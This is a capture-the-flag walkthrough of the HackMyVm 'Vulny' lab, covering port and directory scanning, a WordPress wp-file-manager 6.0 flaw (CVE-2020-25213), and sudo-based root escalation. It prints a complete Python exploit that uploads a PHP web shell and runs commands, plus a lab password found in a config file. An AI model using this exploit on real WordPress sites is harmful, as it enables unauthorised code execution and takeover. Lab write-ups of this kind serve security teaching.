Try   HackMD

Walkthrough HackMyVm - Vulny

vulny.PNG

Here I will make a writeup of the Vulny machine on the HackMyVm platform and this is an easy rated VM, if you are interested you can click the link here. Let's start.

Reconnaissance

As always the first thing i do is port scanning. and at this point nmap only find one open TCP port that is HTTP (80):

$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds                                                     

Website

1.PNG

The website display provided is only the default display, so we need to look for a hidden path or file using bruteforce directory tools such as dirb, dirsearch, etc.

Directory Bruteforce

─$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/

[04:12:21] Starting: 
[04:12:49] 200 -   11KB - /index.html                                       
[04:12:51] 301 -  317B  - /javascript  ->  http://192.168.1.38/javascript/  
[04:13:10] 301 -  313B  - /secret  ->  http://192.168.1.38/secret/          
              
Task Completed                                                                                                                             

Here we find 2 directories, namely /javascript and /secret. If we access /javascript the response given is Forbidden or not permitted. but in the /secret directory you can access it and find a note.

2.PNG

From this information, it is known that there is an endpoint config from WordPress which contains a password/username. but this is quite strange because if we use wappalyzer or wpscan we find no indication that the web server uses wordpress.

3.PNG

Next, we try to bruteforce the directory again using dirsearch specifically for the secret path.

$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/secret/

[04:32:45] Starting: 
[04:33:29] 200 -    7KB - /secret/readme.html                               
[04:33:42] 301 -  322B  - /secret/wp-admin  ->  http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 -  324B  - /secret/wp-content  ->  http://192.168.1.38/secret/wp-content/
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/akismet.php    
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/admin.php      
[04:33:42] 200 -    2KB - /secret/wp-content/                               
[04:33:42] 200 - 1003B  - /secret/wp-content/upgrade/                       
[04:33:42] 200 -    1KB - /secret/wp-content/uploads/                       
[04:33:42] 301 -  325B  - /secret/wp-includes  ->  http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 -    3KB - /secret/wp-admin/setup-config.php                 
[04:33:43] 500 -    0B  - /secret/wp-includes/rss-functions.php             
                                                                        
Task Completed                                                                   

From these results, 3 paths were found, namely;
/wp-admin = The response given is the same as /secret

4.PNG

/wp-content = Response 200

5.PNG

/wp-includes = Forbidden

6.PNG

Next, we can focus on /wp-content and in it there is the /uploads directory and if we access it we find that this website uses the wp-file-manager plugin.

7.PNG

Web Exploitation

If we access http://192.168.1.38/secret/wp-content/uploads/2020/10/ You will find the version of wp-file-manager, namely 6.0. and this version vulnerable !

8.PNG

We need to download the exploit and make small changes to the location of the url by adding /secret.

#!/usr/bin/env

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):

	exec_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
		"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
			'Connection': "close" 
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
		r=requests.post(upload_url,data=payload,headers=headers)
		#pprint(r.json())
		commandexec(command)
	except:
		print("[!] Algo ha salido mal...")

def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")


if __name__ == '__main__':

	if len(sys.argv) != 3:
		help()

	else:
		exploit()

Then run the script.

9.PNG

Here we managed to get the shell, next we need to get the reverse shell.

10.PNG

After getting the reverse shell, we need to check the config file to find the user/password like the hint given in /secret earlier.

11.PNG

idrinksomewater

A password was found, and we checked in /etc/passwd there was a user adrian. and we can assume that this password belongs to Ari Adrian.

Initial Access

Login as adrian and the password you obtained earlier. and here we have successfully entered.

12.PNG

We need to do is check whether the user can exercise sudo access rights or not and to display a list of permitted commands with the command sudo -l

13.PNG

There is a binary flock and we can use it to carry out privilege escalation.

14.PNG

And root was successfully obtained. Vulny pwned!

15.PNG